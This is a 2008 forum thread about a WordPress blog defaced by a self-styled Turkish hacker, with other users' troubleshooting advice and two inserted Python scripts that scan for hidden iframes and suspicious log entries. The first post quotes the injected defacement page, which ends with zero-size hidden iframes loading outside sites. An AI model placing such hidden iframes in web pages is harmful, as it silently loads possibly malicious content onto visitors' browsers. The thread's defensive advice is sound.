Hacked by Turkish Hacker

Discussion in 'Security' started by caj, Sep 25, 2008.

  1. #1

    I don't know why he did it. This Turkish hacker 'defaced' my news blog yesterday. Now all the 'categories' in the blog have disappeared. All the posts have now reverted to the 'uncategorized' section. The worst thing - I can create new categories.

    Please help me :confused:



    Here is the code - left in the blog


    <div id="Layer1" style="position:absolute; left:0; top:0; width:1000; height:1000;
    z-index:1; background-color: #000000; layer-background-color: #ccccc; border: 1px none #000000"> <strong><font color="#777777" face="Verdana" <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html>
    <head>
    <title>HACKED BY iskorpitx (Turkish Hacker)</title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <link href="../bcvb.css" rel="stylesheet" type="text/css">
    </head>
    <body bgcolor="#000000" text="#FFFFFF">
    &nbsp;
    <p align="center">&nbsp;</p>
    <p align="center">
    <img src="http://www.mavi1.org/forum/atam.gif" width="157" height="99"></p>
    <p align="center"><font size="5">BY iSKORPiTX; <BR> &nbsp;</font></p>

    <p align="center"><font size="5">(TURKISH HACKER)</font></p>
    <div align="center">
    <table width="53%" border="1" align="center" bordercolor="#000000" bgcolor="#000000">
    <tr>
    <td bgcolor="#000000">
    </font>
    <font color="#777777" face="Verdana" <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <p align="center">

    </p>
    <p align="center">&nbsp;</p>


    <p align="center"><font size="2" face="Arial, Courier, Haettenschweiler">
    <br>
    </font></p>
    <p align="center">&nbsp;</p>
    </td>
    </tr>
    <tr>
    <td height="64" background="HAcking">
    <div align="center">&nbsp;</div></td>

    </tr>
    </table>

    </div>
    </body>
    </html>
    <iframe src="http://www.mavi1.org" frameborder="0" width="0" height="0"></iframe>
    <iframe src="http://www.mavi1.org/forum" frameborder="0" width="0" height="0"></iframe>
    <iframe src="http://www.siyamiozkan.com.tr" frameborder="0" width="0" height="0"></iframe>
    <iframe src="http://www.crosswindchurch.com/kbd/" width="0" height="0"></iframe>
     
    caj, Sep 25, 2008 IP
  2. MineMoney

    MineMoney Banned

    #2
    What's the address?
     
    MineMoney, Sep 25, 2008 IP
  3. caj

    caj Active Member

    #3
    caj, Sep 25, 2008 IP
  4. MineMoney

    MineMoney Banned

    #4
    Check your .htaccess and see if the codes are there or not.
     
    MineMoney, Sep 25, 2008 IP
  5. caj

    caj Active Member

    #5

    The .htaccess still looks as usual. No additional code has been inserted.
    The server has been reformatted by my hosting co.

    The only problem now is that all the categories have disappeared. I still have all the posts though.

    I have done a clean install of WordPress 2.6.2, disabled then deleted all the plugins. Nothing changed :(
     
    caj, Sep 25, 2008 IP
  6. theivo

    theivo Well-Known Member

    #6
    Why don't you ask your hosting provider to restore your site from backup first, and then to install WordPress 2.6?
     
    theivo, Sep 30, 2008 IP
  7. caj

    caj Active Member

    #7
    They did. The hacker came back and defaced the site again. The site was down for more than 24 hours because of the 'silly' attack.

    Any other recommendations on how to keep a site from being hacked, especially WordPress? I've installed a plugin that detects IP addresses. I hope it can help.
     
    caj, Oct 5, 2008 IP
  8. ngcoders

    ngcoders Active Member

    #8
    Track down how he is doing it, look at raw logs ... not easy though.

    Best way is to find the exploit and fix it.
     
    ngcoders, Oct 5, 2008 IP
  9. hostsvault

    hostsvault Guest

    #9
    Ask your host if they are running mod_security or not?
     
    hostsvault, Oct 8, 2008 IP
  10. SteveWh

    SteveWh Member

    #10
    Find timestamps on the files that got modified, then check your access logs for who was requesting pages (or accessing the site by FTP) at the time of the attack. If you can find the attack in the logs, it will help you to discover how they got into the site. The URLs in the logs might show exactly how they executed the attack.

    If you were already using the latest WP version when the site was hacked, maybe there's yet another new vulnerability that hasn't been announced or patched yet.

    Why not switch to plain HTML pages and forget about WP?
    Here is the WP security report at Secunia: http://secunia.com/advisories/product/6745/?task=advisories
     
    SteveWh, Oct 11, 2008 IP
  11. Mxhub

    Mxhub Active Member

    #11
    Make sure you upgrade your WP to the latest.
    I suggest you back up your database and then remove all the files from your account. Reupload a complete new copy of WP! Yes, you must follow these steps.

    Because I have found that hackers also upload some .php files to your account which you will never notice.


    ---
    joseph
     
    Mxhub, Oct 12, 2008 IP
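A way to do the file check that post #11 points at, as an added example that is not part of any post in this thread: it walks a web root and reports files modified after a cutoff or containing an iframe with width and height 0, the form seen in the code in post #1. The directory tree, file names, `example.invalid` URL and one-day cutoff are constructed for the demonstration.

```python
import os
import re
import tempfile
import time

# An <iframe> tag, and a width/height attribute set to 0 inside it (the form
# of the hidden iframes in the code quoted in post #1).
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
ZERO_RE = re.compile(r"""\b(width|height)\s*=\s*["']?0(?:px)?["']?(?=[\s>/])""", re.I)

def hidden_iframes(html):
    """Return iframe tags that set both width and height to 0."""
    return [tag for tag in IFRAME_RE.findall(html)
            if {m.group(1).lower() for m in ZERO_RE.finditer(tag)} == {"width", "height"}]

def audit_webroot(root, since_epoch, exts=(".php", ".html", ".htm", ".js")):
    """Report files modified after since_epoch or containing hidden iframes."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in (n for n in files if n.lower().endswith(exts)):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                frames = hidden_iframes(fh.read())
            changed = os.path.getmtime(path) > since_epoch
            if frames or changed:
                findings.append((os.path.relpath(path, root), changed, len(frames)))
    return sorted(findings)

def demo():
    """Constructed tree: a clean old page, an injected old page, a new upload."""
    now = time.time()
    samples = {
        "about.html": "<p>About</p>",
        "index.php": '<iframe src="http://example.invalid/" width="0" height="0"></iframe>',
        "wp-content/new.php": "<?php /* file not in the WordPress package */ ?>",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        for rel in ("about.html", "index.php"):  # backdate to 30 days ago
            os.utime(os.path.join(root, rel), (now - 30 * 86400,) * 2)
        return audit_webroot(root, since_epoch=now - 86400)  # cutoff: 1 day ago

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

The backdated `index.php` is reported on its content alone, so a file can be flagged even when its timestamp looks old.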
  12. adviceforall

    adviceforall Banned

    #12
    I would get better security on the server, either Apache or stuff. It's a bug, so I would suggest updating and adding security patches to Apache.
     
    adviceforall, Oct 12, 2008 IP
  13. scoopy82

    scoopy82 Active Member

    #13
    mmmm... an iframe injection hack. What other scripts do you have uploaded to your account? Maybe something long forgotten about? Anything like a contact form, guestbook, or image gallery?

    Probably too late now (all those DP'rs have hit your link). I would look through your logs or latest visitors and look for the very long URLs. That should point you to the vulnerable script.

    And the next time you have things all cleared up... it would be very wise to change all your account / script passwords.
     
    scoopy82, Oct 12, 2008 IP
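The log check described in posts #10 and #13, as an added example that is not part of any post in this thread: it parses Apache-style access log lines and returns requests made close to a file's modification time, plus any request with a very long URL. The log lines, IP addresses (documentation ranges), paths and modification time are constructed, and the 10-minute window and 200-character threshold are assumptions.

```python
import re
from datetime import datetime, timedelta, timezone

# Apache common/combined format: host ident user [time] "METHOD url PROTO" status size
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3}) \S+')

def parse(lines):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        try:
            rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
        except ValueError:
            continue
        yield rec

def suspects(lines, modified_at, window_min=10, long_url=200):
    """Return (ip, request, reasons) for requests made within window_min minutes
    of modified_at, or whose URL is at least long_url characters long."""
    window = timedelta(minutes=window_min)
    out = []
    for rec in parse(lines):
        reasons = []
        if abs(rec["time"] - modified_at) <= window:
            reasons.append("near-mtime")
        if len(rec["url"]) >= long_url:
            reasons.append("long-url")
        if reasons:
            out.append((rec["ip"], rec["method"] + " " + rec["url"][:40], reasons))
    return out

# Constructed sample data: documentation-range IPs, made-up paths and times.
SAMPLE = [
    '192.0.2.10 - - [24/Sep/2008:09:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [24/Sep/2008:13:58:40 +0000] "POST /old/contact.php HTTP/1.1" 200 310',
    '203.0.113.5 - - [23/Sep/2008:22:10:00 +0000] "GET /gallery/view.php?q='
    + "A" * 250 + ' HTTP/1.1" 200 99',
    'garbage line that does not parse',
]
MODIFIED_AT = datetime(2008, 9, 24, 14, 0, 0, tzinfo=timezone.utc)  # mtime of a changed file

if __name__ == "__main__":
    for hit in suspects(SAMPLE, MODIFIED_AT):
        print(hit)
```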
  14. [u]MuTSuZ

    [u]MuTSuZ Peon

    #14
    One TURK against the world because we are Turkish hacker
     
    [u]MuTSuZ, Oct 12, 2008 IP
  15. hiyungnu Erdemir

    hiyungnu Erdemir Peon

    #15
    Live Turkish hackers, my support is limitless to Turkish hackers :D
     
    hiyungnu Erdemir, Oct 12, 2008 IP
  16. Smitten

    Smitten Well-Known Member

    #16
    Same thing happened to me today in 3 of my blogs (which are running from the same web host). I'm actually grateful since apparently the databases remain in place. Looks to me that the attack just messed around with the index.php from each blog.

    It will probably be a major pain in the ass restoring everything to normal, but still I guess it could have been worse.
     
    Smitten, Nov 5, 2008 IP
  17. Smitten

    Smitten Well-Known Member

    #17
    Also, I was using the latest WordPress in all 3 blogs...
     
    Smitten, Nov 5, 2008 IP
  18. mill123

    mill123 Active Member

    #18
    gah i got done today!
     
    mill123, Nov 26, 2008 IP
  19. caj

    caj Active Member

    #19
    What's that supposed to mean? You're adding another post count?
     
    caj, Nov 27, 2008 IP
  20. mill123

    mill123 Active Member

    #20
    Err. Possibly it means I got hacked by the very hacker this entire thread is about?
     
    mill123, Nov 27, 2008 IP